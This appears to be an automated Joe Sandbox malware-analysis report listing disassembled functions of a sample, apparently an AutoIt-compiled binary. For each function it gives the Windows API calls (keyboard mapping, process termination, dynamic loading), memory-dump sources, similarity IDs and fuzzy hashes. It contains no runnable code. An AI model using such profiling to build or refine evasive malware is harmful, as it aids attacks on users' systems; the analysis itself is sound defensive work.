                                                                                                                                                          • Part of subcall function 00AB884D: RtlDeleteCriticalSection.NTDLL(00B4AC68), ref: 00AB89F8
                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00AB880A
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00AB8833
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2942034483-0
                                                                                                                                                        • Opcode ID: 7ccde39a94c6069050334b595f8b1049fcd6b73b1aeb9a5e318896b8be4e4d7c
                                                                                                                                                        • Instruction ID: ad7e55b539d33b5085afbfa151fee82edddc35be92537350a12d31cfdc9929aa
                                                                                                                                                        • Opcode Fuzzy Hash: 7ccde39a94c6069050334b595f8b1049fcd6b73b1aeb9a5e318896b8be4e4d7c
                                                                                                                                                        • Instruction Fuzzy Hash: 13F0903211A7515AF2247B7C7E17ACA26CC9F02BB4B650A2AF464D60D3FF188881C160
                                                                                                                                                        Function 00ADA3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1423608774-0
                                                                                                                                                        • Opcode ID: 1929a67fc569f3bc67e44b0f7197e69096c46a509f0512edb723132c612c17c1
                                                                                                                                                        • Instruction ID: fd31a8ea27887858078b7e9fbf44a74066fbceae002c7fa837bd765d7da64dd0
                                                                                                                                                        • Opcode Fuzzy Hash: 1929a67fc569f3bc67e44b0f7197e69096c46a509f0512edb723132c612c17c1
                                                                                                                                                        • Instruction Fuzzy Hash: B701A436541211ABD7152B58ED48DEB77AAFF9A702B80452AF503972A1CFB4AC00CB91
                                                                                                                                                        Function 00A91867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A91898
                                                                                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00A918A0
                                                                                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A918AB
                                                                                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A918B6
                                                                                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00A918BE
                                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A918C6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Virtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4278518827-0
                                                                                                                                                        • Opcode ID: 577a52bf346bebf0b83adc802fa55670185daf37480723efb68ebaf643ca4640
                                                                                                                                                        • Instruction ID: 3b9bcdf7a7579d8408eeae52ed9e90d99d2af7cc2bd444ae3a97b82ffc07ce0d
                                                                                                                                                        • Opcode Fuzzy Hash: 577a52bf346bebf0b83adc802fa55670185daf37480723efb68ebaf643ca4640
                                                                                                                                                        • Instruction Fuzzy Hash: 1D0167B0902B5ABDE3008F6A8C85B52FFB8FF19354F04411BA15C47A42C7F5A864CBE5
                                                                                                                                                        Function 00AD84F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00AD8504
                                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00AD851A
                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00AD8529
                                                                                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AD8538
                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AD8542
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AD8549
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 839392675-0
                                                                                                                                                        • Opcode ID: fd2fede7731c687fd2c279597ed0bf3412b27463966a5873650445d082c66686
                                                                                                                                                        • Instruction ID: 3af5fa37420c26538afc17cf73c4d7324f1e272211ff92879dd4d740885e70fc
                                                                                                                                                        • Opcode Fuzzy Hash: fd2fede7731c687fd2c279597ed0bf3412b27463966a5873650445d082c66686
                                                                                                                                                        • Instruction Fuzzy Hash: C8F0BE32240158BBE7201B629C0EEEF3F7CDFC6B11F404018FA05E2050EFA42A01C6B4
                                                                                                                                                        Function 00ADA31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00ADA330
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00ADA341
                                                                                                                                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,00B066D3,?,?,?,?,?,00A9E681), ref: 00ADA34E
                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00B066D3,?,?,?,?,?,00A9E681), ref: 00ADA35B
                                                                                                                                                          • Part of subcall function 00AD9CCE: CloseHandle.KERNEL32(?,?,00ADA368,?,?,?,00B066D3,?,?,?,?,?,00A9E681), ref: 00AD9CD8
                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00ADA36E
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00ADA375
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3495660284-0
                                                                                                                                                        • Opcode ID: edad5dcedc27b920134e53c6b70838f008068f54232d890ee26d864128e402d1
                                                                                                                                                        • Instruction ID: dc07a182b7fc25d1efc266f16b0d510e1bdf06166924a533032710f0ed68f212
                                                                                                                                                        • Opcode Fuzzy Hash: edad5dcedc27b920134e53c6b70838f008068f54232d890ee26d864128e402d1
                                                                                                                                                        • Instruction Fuzzy Hash: 92F08236141211BBD3112B64ED4CDDB7B7AFF8A302B804522F203A71A1CFB59851CB91
                                                                                                                                                        Function 00AAD7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AB010A: std::exception::exception.LIBCMT ref: 00AB013E
                                                                                                                                                          • Part of subcall function 00AB010A: __CxxThrowException@8.LIBCMT ref: 00AB0153
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                          • Part of subcall function 00A9BBD9: _memmove.LIBCMT ref: 00A9BC33
                                                                                                                                                        • __swprintf.LIBCMT ref: 00AAD98F
                                                                                                                                                        Strings
                                                                                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00AAD832
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                        • API String ID: 1943609520-557222456
                                                                                                                                                        • Opcode ID: 1e018945a3068b3b1e03e1d23476cdf261f1e13bf31d38da23767803a625cf8f
                                                                                                                                                        • Instruction ID: 451047516cbf6a54acfa6f4ed7937fae907bffcd8f5ff4e6039ac1a4e497eef3
                                                                                                                                                        • Opcode Fuzzy Hash: 1e018945a3068b3b1e03e1d23476cdf261f1e13bf31d38da23767803a625cf8f
                                                                                                                                                        • Instruction Fuzzy Hash: 35914A716182019FCB14EF64CA86D6FBBE4EF86700F00495DF4969B6E1EB20ED45CB52
                                                                                                                                                        Function 00AEB482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00AEB4A8
                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00AEB5B7
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00AEB73A
                                                                                                                                                          • Part of subcall function 00ADA6F6: VariantInit.OLEAUT32(00000000), ref: 00ADA736
                                                                                                                                                          • Part of subcall function 00ADA6F6: VariantCopy.OLEAUT32(?,?), ref: 00ADA73F
                                                                                                                                                          • Part of subcall function 00ADA6F6: VariantClear.OLEAUT32(?), ref: 00ADA74B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                        • API String ID: 4237274167-1221869570
                                                                                                                                                        • Opcode ID: ca63d2aa9198d965a27aea94db3783ab2f1a872a6544f158e225e59fa2dc700c
                                                                                                                                                        • Instruction ID: 01d642c60d04bc8f23130544b043df2f44320c9be68883859c12443caf58888a
                                                                                                                                                        • Opcode Fuzzy Hash: ca63d2aa9198d965a27aea94db3783ab2f1a872a6544f158e225e59fa2dc700c
                                                                                                                                                        • Instruction Fuzzy Hash: 3B918A706183419FCB10DF29C58595BB7F4AF89710F04886DF88A8B3A2DB31E945CB62
                                                                                                                                                        Function 00AD1050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00AD10B8
                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00AD10EE
                                                                                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00AD10FF
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AD1181
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                        • String ID: DllGetClassObject
                                                                                                                                                        • API String ID: 753597075-1075368562
                                                                                                                                                        • Opcode ID: 300187ea8d87f28cde8bacd2011eaff286d3150d48fe91b27b1d0862e6435cb9
                                                                                                                                                        • Instruction ID: 1dc8b2e770486a49c87a56d97e7b801039850a5a134065e91977356197d1478f
                                                                                                                                                        • Opcode Fuzzy Hash: 300187ea8d87f28cde8bacd2011eaff286d3150d48fe91b27b1d0862e6435cb9
                                                                                                                                                        • Instruction Fuzzy Hash: 534129B1600205FFDB15CF55C884B9ABBB9EF44754B1481AEFA0A9F305D7B1DA44CBA0
                                                                                                                                                        Function 00AD5A25 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AD5A93
                                                                                                                                                        • GetMenuItemInfoW.USER32 ref: 00AD5AAF
                                                                                                                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00AD5AF5
                                                                                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B518F0,00000000), ref: 00AD5B3E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 1173514356-4108050209
                                                                                                                                                        • Opcode ID: 8b026900d22fefee691593e8017e4b55e1338e06a5983aa76b64f8795ed6a198
                                                                                                                                                        • Instruction ID: c03a201978f72c51f23077ea994570e87e37ddb3829a566c077f7c4ee70909e5
                                                                                                                                                        • Opcode Fuzzy Hash: 8b026900d22fefee691593e8017e4b55e1338e06a5983aa76b64f8795ed6a198
                                                                                                                                                        • Instruction Fuzzy Hash: C6416E716047019FDB149F24C884B5ABBE5EF89714F14461FF9A69B3D1E770A800CB62
                                                                                                                                                        Function 00AF0458 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 00AF0478
                                                                                                                                                          • Part of subcall function 00A97F40: _memmove.LIBCMT ref: 00A97F8F
                                                                                                                                                          • Part of subcall function 00A9A2FB: _memmove.LIBCMT ref: 00A9A33D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove$BuffCharLower
                                                                                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                        • API String ID: 2411302734-567219261
                                                                                                                                                        • Opcode ID: feedd6f63746c3381cf36b0360ffacd1f84942d6257be3c08aab1e7040854a7c
                                                                                                                                                        • Instruction ID: 37635e7b08491df0cf361b6c9e090c471f822f8d97b0163e39a168cc06dd7f9d
                                                                                                                                                        • Opcode Fuzzy Hash: feedd6f63746c3381cf36b0360ffacd1f84942d6257be3c08aab1e7040854a7c
                                                                                                                                                        • Instruction Fuzzy Hash: 49316D75600619AFCF04DF98C941ABEB3F5FF15350B108A29E562972D2DB71EA05CF80
                                                                                                                                                        Function 00ACC600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
